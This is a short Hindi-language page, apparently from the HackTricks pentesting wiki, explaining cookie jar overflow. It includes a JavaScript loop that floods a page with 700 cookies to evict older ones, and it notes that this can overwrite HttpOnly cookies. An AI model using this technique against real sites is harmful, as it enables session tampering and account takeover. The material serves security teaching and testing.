tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

ब्राउज़र के पास एक सीमा होती है कि वे एक पृष्ठ के लिए कितने कुकीज़ स्टोर कर सकते हैं। फिर, यदि किसी कारणवश आपको एक कुकी को गायब करना है, तो आप कुकी जार को ओवरफ्लो कर सकते हैं क्योंकि सबसे पुरानी कुकीज़ पहले हटा दी जाएंगी:

javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

ध्यान दें, कि तीसरे पक्ष के कुकीज़ जो एक अलग डोमेन की ओर इशारा करते हैं, उन्हें अधिलेखित नहीं किया जाएगा।

caution

यह हमला HttpOnly कुकीज़ को अधिलेखित करने के लिए भी उपयोग किया जा सकता है क्योंकि आप इसे हटा सकते हैं और फिर इसे उस मान के साथ रीसेट कर सकते हैं जिसे आप चाहते हैं

इसे इस पोस्ट में एक प्रयोगशाला के साथ जांचें।

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें